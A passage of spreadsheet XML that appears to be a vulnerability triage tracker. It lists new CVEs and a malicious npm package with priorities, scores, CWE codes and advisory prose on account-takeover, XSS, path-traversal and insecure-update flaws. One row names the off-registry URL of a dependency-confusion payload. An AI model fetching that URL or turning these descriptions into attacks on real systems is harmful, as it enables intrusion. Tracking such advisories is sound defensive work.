          <t>https://osv.dev/vulnerability/MAL-2026-17565</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17566</t>
        </is>
      </c>
      <c r="D223" s="5" t="inlineStr"/>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="inlineStr"/>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr">
        <is>
          <t>npm:unified-platform</t>
        </is>
      </c>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8d42d95f6d25be97f23633f7088e06ac7faf2bd7f4fbc20fa85b5be18c90f6b)
package.json declares a single dependency 'ltidisafe' sourced directly from the off-registry URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.8.2.tgz, with no registry version range and no integrity hash. On npm install, npm fetches and installs whatever bytes that URL currently serves, executing any lifecycle scripts contained inside the fetched tarball under the installer's account. The GCS bucket host is not tied to any declared publisher of this package, and the fetched content can be changed at any time without a corresponding package republish. The shipped index.js is an empty stub, so the manifest's off-registry fetch is the package's entire effect on the installer. The package name 'unified-platform' at the implausibly high version 99.9.1 is consistent with a dependency-confusion lure targeting an internal name.
</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17566</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88779</t>
        </is>
      </c>
      <c r="D224" s="5" t="inlineStr"/>
      <c r="E224" s="5" t="inlineStr"/>
      <c r="F224" s="5" t="inlineStr"/>
      <c r="G224" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I224" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr"/>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>2026-10-07</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Citrix NetScaler ADC (formerly Citrix ADC) and Citrix NetScaler Gateway (formerly Citrix Gateway) contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow for a denial of service.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88779</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T224"/>
  <conditionalFormatting sqref="E2:E22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24">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CVE-2026-105207</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.0.0 through 3.4.15 and 4.0.0 before 4.17.3 creates links between user accounts and external identity providers without verifying a primary factor or the caller's permission, including on identify-only Login V2 sessions and via the User Service V2 AddIDPLink endpoint. An unauthenticated attacker knowing a victim's login name can bind their own external IdP identity to the victim's account and then sign in as the victim.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105207</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105209</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.6</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2026-10-04</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.15 and 4.x before 4.17.1 contains an improper authorization vulnerability: when issuing passkey or passwordless enrollment codes, it checks only the organization in the x-zitadel-orgid header, not the target user's organization. Attackers with user-write permission in one organization can obtain an enrollment code for a user in another organization on the same instance and register their own authenticator to take over that account.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105209</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103355</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S4"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4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103355</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105215</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>ZITADEL before 3.4.14 and 4.x before 4.16.2 contains an authentication bypass in the hosted Login V1 UI because the 'external account not found' registration endpoint trusts client-supplied external identity fields without a completed IdP callback. Unauthenticated attackers can submit forged IDPConfigID and ExternalUserID values to pre-create an account bound to a victim's external IdP identity, which the victim's later genuine external login then signs into.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105215</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105086</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.699999999999999</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CWE-79</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo 12.4 through 29.2.0 contains a stored cross-site scripting vulnerability that allows authenticated uploaders to inject HTML by submitting doubly-encoded entities in video titles. Because safeString() strips tags before decoding entities and runs twice via setTitle() and save(), attackers can store markup that executes in trending, gallery, embed, and playlist pages.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105086</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105089</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through 29.2.0 contains a stored cross-site scripting vulnerability that allows users with upload permission to inject script by setting a malicious video trailer1 URL. The value is rendered unescaped in YouPHPFlix2 templates and channel playlists, letting attackers break out of onclick strings or iframe src attributes to execute JavaScript in victims' browsers.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105089</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105210</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.15 and 4.x before 4.17.1 contains a missing authentication flaw in the hosted Login V1 UI, whose second-factor enrollment and initialization handlers act on an identify-only session before any primary factor is verified. Attackers knowing only a victim's login name can enroll attacker-controlled TOTP, OTP-SMS, OTP-Email, or U2F factors, overwrite the verified phone number, and enumerate users through discrepant errors.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105210</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105213</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 4.x before 4.17.1 does not check an organization's inactive state during Login V2 authentication, verifying only the individual user's status. Users of a deactivated organization who hold valid credentials, an existing session, or a refresh token can still sign in, create sessions, and obtain or refresh tokens.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105213</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105211</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>ZITADEL before 4.17.1 contains an authentication bypass vulnerability in Login V2 that allows unauthenticated attackers to take over accounts by obtaining OTP codes via the returnCode delivery type. Attackers knowing a login name of a victim with OTP-Email and OTP-SMS enrolled can read both codes from server-action responses to gain MFA-authenticated sessions, including administrator takeover.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105211</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105293</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Legcord 1.1.0 through 1.3.0 contains a path traversal vulnerability in theme IPC handlers that allows script in the Discord page to escape the themes directory via unvalidated theme ids. Attackers running script in the Discord origin, such as through XSS, can abuse themes.folder, themes.uninstall, and themes.install to launch local executables, recursively delete directories, and write files outside the themes directory.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105293</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105220</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>NVD</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is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Twine 2 desktop through 2.12.0 contains a cross-site scripting vulnerability in importStories() that executes markup from imported story files in the editor window. Attackers can craft a story file whose script calls the twineElectron openWithScratchFile IPC bridge to write and open a .bat file, executing code as the user.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105220</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105208</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7.7</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2026-10-04</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-649</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 4.x before 4.17.3 and 3.x through 3.4.15 protects IdP intent tokens with unauthenticated, malleable encryption, allowing authenticated users to tamper with their own token so it is accepted for another user's external login intent. An attacker who predicts a victim's in-flight intent identifier and wins a timing race can call /v2/idp_intents or /v2/sessions to steal the victim's IdP tokens or hijack their session.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105208</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105212</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>7.5</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2026-10-04</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.14 and 4.x before 4.16.2 contains an authentication bypass in the hosted Login V1 and Login V2 UIs that accepts passkey or other authenticator enrollment on identify-only login sessions, before any primary factor is verified. Unauthenticated attackers knowing only a victim's login name can register an attacker-controlled authenticator and log in as that user, bypassing existing passwords and MFA.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105212</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105219</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>7.5</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2026-10-04</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Mammoth.js 1.3.0 before 1.12.3 contains a regular expression denial of service vulnerability in the style map tokeniser in lib/styles/parser/tokeniser.js due to overlapping regex alternatives. Attackers can supply a crafted .docx with an unterminated quoted string of repeated backslash escapes in mammoth/style-map to block the Node.js event loop.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105219</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105295</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>GitAhead 2.5.0 through 2.7.1 contains an insecure update mechanism that installs downloaded updates without integrity or signature verification and permanently ignores TLS errors after one SSL error dialog. Network attackers presenting an invalid certificate once can intercept later automatic update checks, offer a fake version, and execute code as the user upon installation.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105295</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97307</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in StylemixThemes Cost Calculator Builder cost-calculator-builder allows Retrieve Embedded Sensitive Data.This issue affects Cost Calculator Builder: from n/a through 4.0.17.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97307</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105216</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
